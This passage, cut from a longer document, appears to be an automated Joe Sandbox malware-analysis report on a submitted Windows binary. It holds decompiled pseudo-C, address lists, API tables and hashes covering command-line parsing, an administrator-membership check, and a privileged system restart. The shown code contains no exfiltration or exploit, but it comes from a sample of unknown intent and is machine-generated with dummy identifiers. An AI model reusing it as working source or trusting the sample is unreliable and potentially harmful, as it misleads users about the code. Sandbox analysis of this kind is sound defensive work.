                                                                                                                                                                                                        																		if(_t129 == 0x41) {
                                                                                                                                                                                                        																			goto L83;
                                                                                                                                                                                                        																		} else {
                                                                                                                                                                                                        																			if(_t129 == 0x55) {
                                                                                                                                                                                                        																				goto L76;
                                                                                                                                                                                                        																			} else {
                                                                                                                                                                                                        																				goto L49;
                                                                                                                                                                                                        																			}
                                                                                                                                                                                                        																		}
                                                                                                                                                                                                        																	}
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																L76:
                                                                                                                                                                                                        																_push(2);
                                                                                                                                                                                                        																_pop(1);
                                                                                                                                                                                                        																L83:
                                                                                                                                                                                                        																 *0xa98a38 = 1;
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        															goto L50;
                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                        															_t132 = _t127 - 1;
                                                                                                                                                                                                        															if(_t132 == 0) {
                                                                                                                                                                                                        																if(_v266 != 0) {
                                                                                                                                                                                                        																	if(_v266 != 0x3a) {
                                                                                                                                                                                                        																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                                                                                                                                                                        																			goto L49;
                                                                                                                                                                                                        																		}
                                                                                                                                                                                                        																	} else {
                                                                                                                                                                                                        																		_t201 = _v265;
                                                                                                                                                                                                        																		 *0xa99a2c = 1;
                                                                                                                                                                                                        																		if(_t201 != 0) {
                                                                                                                                                                                                        																			_t220 =  &_v265;
                                                                                                                                                                                                        																			do {
                                                                                                                                                                                                        																				_t220 = _t220 + 1;
                                                                                                                                                                                                        																				_t142 = CharUpperA(_t201) - 0x41;
                                                                                                                                                                                                        																				if(_t142 == 0) {
                                                                                                                                                                                                        																					_t143 = 2;
                                                                                                                                                                                                        																					 *0xa99a2c =  *0xa99a2c | _t143;
                                                                                                                                                                                                        																					goto L70;
                                                                                                                                                                                                        																				} else {
                                                                                                                                                                                                        																					_t145 = _t142 - 3;
                                                                                                                                                                                                        																					if(_t145 == 0) {
                                                                                                                                                                                                        																						 *0xa98d48 =  *0xa98d48 | 0x00000040;
                                                                                                                                                                                                        																					} else {
                                                                                                                                                                                                        																						_t146 = _t145 - 5;
                                                                                                                                                                                                        																						if(_t146 == 0) {
                                                                                                                                                                                                        																							 *0xa99a2c =  *0xa99a2c & 0xfffffffd;
                                                                                                                                                                                                        																							goto L70;
                                                                                                                                                                                                        																						} else {
                                                                                                                                                                                                        																							_t147 = _t146 - 5;
                                                                                                                                                                                                        																							if(_t147 == 0) {
                                                                                                                                                                                                        																								 *0xa99a2c =  *0xa99a2c & 0xfffffffe;
                                                                                                                                                                                                        																								goto L70;
                                                                                                                                                                                                        																							} else {
                                                                                                                                                                                                        																								_t149 = _t147;
                                                                                                                                                                                                        																								if(_t149 == 0) {
                                                                                                                                                                                                        																									 *0xa98d48 =  *0xa98d48 | 0x00000080;
                                                                                                                                                                                                        																								} else {
                                                                                                                                                                                                        																									if(_t149 == 3) {
                                                                                                                                                                                                        																										 *0xa99a2c =  *0xa99a2c | 0x00000004;
                                                                                                                                                                                                        																										L70:
                                                                                                                                                                                                        																										 *0xa98a28 = 1;
                                                                                                                                                                                                        																									} else {
                                                                                                                                                                                                        																										_t209 = 0;
                                                                                                                                                                                                        																									}
                                                                                                                                                                                                        																								}
                                                                                                                                                                                                        																							}
                                                                                                                                                                                                        																						}
                                                                                                                                                                                                        																					}
                                                                                                                                                                                                        																				}
                                                                                                                                                                                                        																				_t144 =  *_t220;
                                                                                                                                                                                                        																				_t201 = _t144;
                                                                                                                                                                                                        																			} while (_t144 != 0);
                                                                                                                                                                                                        																		}
                                                                                                                                                                                                        																	}
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	 *0xa99a2c = 3;
                                                                                                                                                                                                        																	 *0xa98a28 = 1;
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        																goto L50;
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																if(_t132 == 0) {
                                                                                                                                                                                                        																	goto L98;
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	L49:
                                                                                                                                                                                                        																	_t209 = 0;
                                                                                                                                                                                                        																	L50:
                                                                                                                                                                                                        																	_t173 = _v272;
                                                                                                                                                                                                        																	if( *_t173 != 0) {
                                                                                                                                                                                                        																		goto L2;
                                                                                                                                                                                                        																	} else {
                                                                                                                                                                                                        																		break;
                                                                                                                                                                                                        																	}
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											goto L106;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										L34:
                                                                                                                                                                                                        										_t209 = 0;
                                                                                                                                                                                                        										break;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L131;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if( *0xa98a2c != 0 &&  *0xa98b3e == 0) {
                                                                                                                                                                                                        						if(GetModuleFileNameA( *0xa99a3c, 0xa98b3e, 0x104) == 0) {
                                                                                                                                                                                                        							_t209 = 0;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t202 = 0x5c;
                                                                                                                                                                                                        							 *((char*)(E00A966C8(0xa98b3e, _t202) + 1)) = 0;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t63 = _t209;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				L131:
                                                                                                                                                                                                        			}


































































                                                                                                                                                                                                        0x00a95d49
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95d19
                                                                                                                                                                                                        0x00a95d19
                                                                                                                                                                                                        0x00a95d1d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95d3f
                                                                                                                                                                                                        0x00a95d3f
                                                                                                                                                                                                        0x00a95d4b
                                                                                                                                                                                                        0x00a95d4b
                                                                                                                                                                                                        0x00a95d4f
                                                                                                                                                                                                        0x00a95d8d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95d93
                                                                                                                                                                                                        0x00a95d93
                                                                                                                                                                                                        0x00a95d9a
                                                                                                                                                                                                        0x00a95d9d
                                                                                                                                                                                                        0x00a95d9e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95d9e
                                                                                                                                                                                                        0x00a95d51
                                                                                                                                                                                                        0x00a95d5b
                                                                                                                                                                                                        0x00a95d72
                                                                                                                                                                                                        0x00a960fb
                                                                                                                                                                                                        0x00a960fb
                                                                                                                                                                                                        0x00a96207
                                                                                                                                                                                                        0x00a9620a
                                                                                                                                                                                                        0x00a9620b
                                                                                                                                                                                                        0x00a9620e
                                                                                                                                                                                                        0x00a96217
                                                                                                                                                                                                        0x00a95d78
                                                                                                                                                                                                        0x00a95d78
                                                                                                                                                                                                        0x00a95d80
                                                                                                                                                                                                        0x00a95d83
                                                                                                                                                                                                        0x00a95d84
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95d84
                                                                                                                                                                                                        0x00a95d5d
                                                                                                                                                                                                        0x00a95d5f
                                                                                                                                                                                                        0x00a95d62
                                                                                                                                                                                                        0x00a95d68
                                                                                                                                                                                                        0x00a95d64
                                                                                                                                                                                                        0x00a95d64
                                                                                                                                                                                                        0x00a95d64
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95d62
                                                                                                                                                                                                        0x00a95d5b
                                                                                                                                                                                                        0x00a95d4f
                                                                                                                                                                                                        0x00a95d1d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95d9f
                                                                                                                                                                                                        0x00a95d9f
                                                                                                                                                                                                        0x00a95da5
                                                                                                                                                                                                        0x00a95dab
                                                                                                                                                                                                        0x00a95dba
                                                                                                                                                                                                        0x00a96218
                                                                                                                                                                                                        0x00a9621d
                                                                                                                                                                                                        0x00a96220
                                                                                                                                                                                                        0x00a96221
                                                                                                                                                                                                        0x00a96229
                                                                                                                                                                                                        0x00a96230
                                                                                                                                                                                                        0x00a96247
                                                                                                                                                                                                        0x00a9626a
                                                                                                                                                                                                        0x00a96272
                                                                                                                                                                                                        0x00a96249
                                                                                                                                                                                                        0x00a96255
                                                                                                                                                                                                        0x00a9625f
                                                                                                                                                                                                        0x00a96264
                                                                                                                                                                                                        0x00a96264
                                                                                                                                                                                                        0x00a96284
                                                                                                                                                                                                        0x00a95dc0
                                                                                                                                                                                                        0x00a95dc0
                                                                                                                                                                                                        0x00a95dca
                                                                                                                                                                                                        0x00a95e22
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95dcc
                                                                                                                                                                                                        0x00a95dce
                                                                                                                                                                                                        0x00a95e24
                                                                                                                                                                                                        0x00a95e24
                                                                                                                                                                                                        0x00a95e2c
                                                                                                                                                                                                        0x00a95e47
                                                                                                                                                                                                        0x00a95e4a
                                                                                                                                                                                                        0x00a961d2
                                                                                                                                                                                                        0x00a961e2
                                                                                                                                                                                                        0x00a961e7
                                                                                                                                                                                                        0x00a961ee
                                                                                                                                                                                                        0x00a961f1
                                                                                                                                                                                                        0x00a961f1
                                                                                                                                                                                                        0x00a961f8
                                                                                                                                                                                                        0x00a961f8
                                                                                                                                                                                                        0x00a95e50
                                                                                                                                                                                                        0x00a95e53
                                                                                                                                                                                                        0x00a96109
                                                                                                                                                                                                        0x00a9611f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a96125
                                                                                                                                                                                                        0x00a96137
                                                                                                                                                                                                        0x00a9613a
                                                                                                                                                                                                        0x00a9613c
                                                                                                                                                                                                        0x00a9613e
                                                                                                                                                                                                        0x00a9613e
                                                                                                                                                                                                        0x00a96141
                                                                                                                                                                                                        0x00a96141
                                                                                                                                                                                                        0x00a96143
                                                                                                                                                                                                        0x00a96144
                                                                                                                                                                                                        0x00a9614a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a96150
                                                                                                                                                                                                        0x00a96152
                                                                                                                                                                                                        0x00a9615c
                                                                                                                                                                                                        0x00a96170
                                                                                                                                                                                                        0x00a96172
                                                                                                                                                                                                        0x00a9617c
                                                                                                                                                                                                        0x00a96190
                                                                                                                                                                                                        0x00a96190
                                                                                                                                                                                                        0x00a96196
                                                                                                                                                                                                        0x00a961a5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a961ab
                                                                                                                                                                                                        0x00a961b9
                                                                                                                                                                                                        0x00a961c6
                                                                                                                                                                                                        0x00a961c6
                                                                                                                                                                                                        0x00a9617e
                                                                                                                                                                                                        0x00a96180
                                                                                                                                                                                                        0x00a9618a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95f07
                                                                                                                                                                                                        0x00a95f02
                                                                                                                                                                                                        0x00a95efc
                                                                                                                                                                                                        0x00a95ef7
                                                                                                                                                                                                        0x00a95ef2
                                                                                                                                                                                                        0x00a95f4c
                                                                                                                                                                                                        0x00a95f4e
                                                                                                                                                                                                        0x00a95f50
                                                                                                                                                                                                        0x00a95f54
                                                                                                                                                                                                        0x00a95ed4
                                                                                                                                                                                                        0x00a95ea2
                                                                                                                                                                                                        0x00a95ea4
                                                                                                                                                                                                        0x00a95eaf
                                                                                                                                                                                                        0x00a95eaf
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95e79
                                                                                                                                                                                                        0x00a95e7d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95e83
                                                                                                                                                                                                        0x00a95e83
                                                                                                                                                                                                        0x00a95e83
                                                                                                                                                                                                        0x00a95e85
                                                                                                                                                                                                        0x00a95e85
                                                                                                                                                                                                        0x00a95e8e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95e94
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95e94
                                                                                                                                                                                                        0x00a95e8e
                                                                                                                                                                                                        0x00a95e7d
                                                                                                                                                                                                        0x00a95e77
                                                                                                                                                                                                        0x00a95e6e
                                                                                                                                                                                                        0x00a95e65
                                                                                                                                                                                                        0x00a95e5c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95dd0
                                                                                                                                                                                                        0x00a95dd0
                                                                                                                                                                                                        0x00a95dd0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95dd0
                                                                                                                                                                                                        0x00a95dce
                                                                                                                                                                                                        0x00a95dca
                                                                                                                                                                                                        0x00a95dba
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a95d00
                                                                                                                                                                                                        0x00a95dd9
                                                                                                                                                                                                        0x00a95e04
                                                                                                                                                                                                        0x00a961fe
                                                                                                                                                                                                        0x00a95e0a
                                                                                                                                                                                                        0x00a95e0c
                                                                                                                                                                                                        0x00a95e17
                                                                                                                                                                                                        0x00a95e17
                                                                                                                                                                                                        0x00a95e04
                                                                                                                                                                                                        0x00a96200
                                                                                                                                                                                                        0x00a96200
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CharNextA.USER32(?,00000000,?,?), ref: 00A95CEE
                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(00A98B3E,00000104,00000000,?,?), ref: 00A95DFC
                                                                                                                                                                                                        • CharUpperA.USER32(?), ref: 00A95E3E
                                                                                                                                                                                                        • CharUpperA.USER32(-00000052), ref: 00A95EE1
                                                                                                                                                                                                        • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00A95F6F
                                                                                                                                                                                                        • CharUpperA.USER32(?), ref: 00A95FA7
                                                                                                                                                                                                        • CharUpperA.USER32(-0000004E), ref: 00A96008
                                                                                                                                                                                                        • CharUpperA.USER32(?), ref: 00A960AA
                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,00A91140,00000000,00000040,00000000), ref: 00A961F1
                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00A961F8
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                        • String ID: "$"$:$RegServer
                                                                                                                                                                                                        • API String ID: 1203814774-25366791
                                                                                                                                                                                                        • Opcode ID: 4dbffb484b6985c8a352d80b7b7984f6c123dd6e2446ec0f8cc8809181cc327e
                                                                                                                                                                                                        • Instruction ID: f7922b3a788ad95304af57be01573b8661f0a84be441bd351db615a2bd9b8b96
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4dbffb484b6985c8a352d80b7b7984f6c123dd6e2446ec0f8cc8809181cc327e
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7BD14471F04A545ADF3BCB7C8C8A7FA3BF1AB16340F1441ABC586CA590DA758E878B40
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 91%
                                                                                                                                                                                                        			E00A918A3(void* __edx, void* __esi) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				short _v12;
                                                                                                                                                                                                        				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                        				char _v20;
                                                                                                                                                                                                        				long _v24;
                                                                                                                                                                                                        				void* _v28;
                                                                                                                                                                                                        				void* _v32;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				signed int _t23;
                                                                                                                                                                                                        				long _t45;
                                                                                                                                                                                                        				void* _t49;
                                                                                                                                                                                                        				int _t50;
                                                                                                                                                                                                        				void* _t52;
                                                                                                                                                                                                        				signed int _t53;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t51 = __esi;
                                                                                                                                                                                                        				_t49 = __edx;
                                                                                                                                                                                                        				_t23 =  *0xa98004; // 0x6298f871
                                                                                                                                                                                                        				_v8 = _t23 ^ _t53;
                                                                                                                                                                                                        				_t25 =  *0xa98128; // 0x2
                                                                                                                                                                                                        				_t45 = 0;
                                                                                                                                                                                                        				_v12 = 0x500;
                                                                                                                                                                                                        				_t50 = 2;
                                                                                                                                                                                                        				_v16.Value = 0;
                                                                                                                                                                                                        				_v20 = 0;
                                                                                                                                                                                                        				if(_t25 != _t50) {
                                                                                                                                                                                                        					L20:
                                                                                                                                                                                                        					return E00A96CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(E00A917EE( &_v20) != 0) {
                                                                                                                                                                                                        					_t25 = _v20;
                                                                                                                                                                                                        					if(_v20 != 0) {
                                                                                                                                                                                                        						 *0xa98128 = 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L20;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                                                                                                                                                        					goto L20;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                                                        					L17:
                                                                                                                                                                                                        					CloseHandle(_v28);
                                                                                                                                                                                                        					_t25 = _v20;
                                                                                                                                                                                                        					goto L20;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_push(__esi);
                                                                                                                                                                                                        					_t52 = LocalAlloc(0, _v24);
                                                                                                                                                                                                        					if(_t52 == 0) {
                                                                                                                                                                                                        						L16:
                                                                                                                                                                                                        						_pop(_t51);
                                                                                                                                                                                                        						goto L17;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                                                                                                                                                        						L15:
                                                                                                                                                                                                        						LocalFree(_t52);
                                                                                                                                                                                                        						goto L16;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						if( *_t52 <= 0) {
                                                                                                                                                                                                        							L14:
                                                                                                                                                                                                        							FreeSid(_v32);
                                                                                                                                                                                                        							goto L15;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t15 = _t52 + 4; // 0x4
                                                                                                                                                                                                        						_t50 = _t15;
                                                                                                                                                                                                        						while(EqualSid( *_t50, _v32) == 0) {
                                                                                                                                                                                                        							_t45 = _t45 + 1;
                                                                                                                                                                                                        							_t50 = _t50 + 8;
                                                                                                                                                                                                        							if(_t45 <  *_t52) {
                                                                                                                                                                                                        								continue;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *0xa98128 = 1;
                                                                                                                                                                                                        						_v20 = 1;
                                                                                                                                                                                                        						goto L14;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}



















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00A917EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00A918DD), ref: 00A9181A
                                                                                                                                                                                                          • Part of subcall function 00A917EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00A9182C
                                                                                                                                                                                                          • Part of subcall function 00A917EE: AllocateAndInitializeSid.ADVAPI32(00A918DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00A918DD), ref: 00A91855
                                                                                                                                                                                                          • Part of subcall function 00A917EE: FreeSid.ADVAPI32(?,?,?,?,00A918DD), ref: 00A91883
                                                                                                                                                                                                          • Part of subcall function 00A917EE: FreeLibrary.KERNEL32(00000000,?,?,?,00A918DD), ref: 00A9188A
                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 00A918EB
                                                                                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00A918F2
                                                                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 00A9190A
                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00A91918
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000000,?,?), ref: 00A9192C
                                                                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00A91944
                                                                                                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00A91964
                                                                                                                                                                                                        • EqualSid.ADVAPI32(00000004,?), ref: 00A9197A
                                                                                                                                                                                                        • FreeSid.ADVAPI32(?), ref: 00A9199C
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00A919A3
                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00A919AD
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2168512254-0
                                                                                                                                                                                                        • Opcode ID: 38aa62599c6a1f8c65d8271dbeea4eed88ae99aac69008de578fc7cef5e29761
                                                                                                                                                                                                        • Instruction ID: f9b4b0c39964eebdc3d24acee4c3d5c2fe6d4e43f2001de64ff82bce7814fa2f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 38aa62599c6a1f8c65d8271dbeea4eed88ae99aac69008de578fc7cef5e29761
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E3311871B0020AABDF20DFE5DC98AAFBBF8FF15700F20042AE545D2160DB359906CB61
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 60%
                                                                                                                                                                                                        			E00A91F90(signed int __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				int _v12;
                                                                                                                                                                                                        				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                                                                                                        				void* _v28;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				signed int _t13;
                                                                                                                                                                                                        				int _t21;
                                                                                                                                                                                                        				void* _t25;
                                                                                                                                                                                                        				int _t28;
                                                                                                                                                                                                        				signed char _t30;
                                                                                                                                                                                                        				void* _t38;
                                                                                                                                                                                                        				void* _t40;
                                                                                                                                                                                                        				void* _t41;
                                                                                                                                                                                                        				signed int _t46;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t41 = __esi;
                                                                                                                                                                                                        				_t38 = __edi;
                                                                                                                                                                                                        				_t30 = __ecx;
                                                                                                                                                                                                        				if((__ecx & 0x00000002) != 0) {
                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                        					if((_t30 & 0x00000004) != 0) {
                                                                                                                                                                                                        						L14:
                                                                                                                                                                                                        						if( *0xa99a40 != 0) {
                                                                                                                                                                                                        							_pop(_t30);
                                                                                                                                                                                                        							_t44 = _t46;
                                                                                                                                                                                                        							_t13 =  *0xa98004; // 0x6298f871
                                                                                                                                                                                                        							_v8 = _t13 ^ _t46;
                                                                                                                                                                                                        							_push(_t38);
                                                                                                                                                                                                        							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                                                                                                                                                        								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                                                                                                                                                        								_v24.PrivilegeCount = 1;
                                                                                                                                                                                                        								_v12 = 2;
                                                                                                                                                                                                        								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                                                                                                                                                        								CloseHandle(_v28);
                                                                                                                                                                                                        								_t41 = _t41;
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								if(_t21 != 0) {
                                                                                                                                                                                                        									if(ExitWindowsEx(2, ??) != 0) {
                                                                                                                                                                                                        										_t25 = 1;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t37 = 0x4f7;
                                                                                                                                                                                                        										goto L3;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t37 = 0x4f6;
                                                                                                                                                                                                        									goto L4;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t37 = 0x4f5;
                                                                                                                                                                                                        								L3:
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								L4:
                                                                                                                                                                                                        								_push(0x10);
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								E00A944B9(0, _t37);
                                                                                                                                                                                                        								_t25 = 0;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_pop(_t40);
                                                                                                                                                                                                        							return E00A96CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t28 = ExitWindowsEx(2, 0);
                                                                                                                                                                                                        							goto L16;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t37 = 0x522;
                                                                                                                                                                                                        						_t28 = E00A944B9(0, 0x522, 0xa91140, 0, 0x40, 4);
                                                                                                                                                                                                        						if(_t28 != 6) {
                                                                                                                                                                                                        							goto L16;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					__eax = E00A91EA7(__ecx);
                                                                                                                                                                                                        					if(__eax != 2) {
                                                                                                                                                                                                        						L16:
                                                                                                                                                                                                        						return _t28;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						goto L12;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}


















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00A91EFB
                                                                                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00A91F02
                                                                                                                                                                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 00A91FD3
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                        • String ID: SeShutdownPrivilege
                                                                                                                                                                                                        • API String ID: 2795981589-3733053543
                                                                                                                                                                                                        • Opcode ID: 5e7df0855c596bc1c9276fbc3f363a7c66aff43c422cd86c642d97c5a62cf4dc
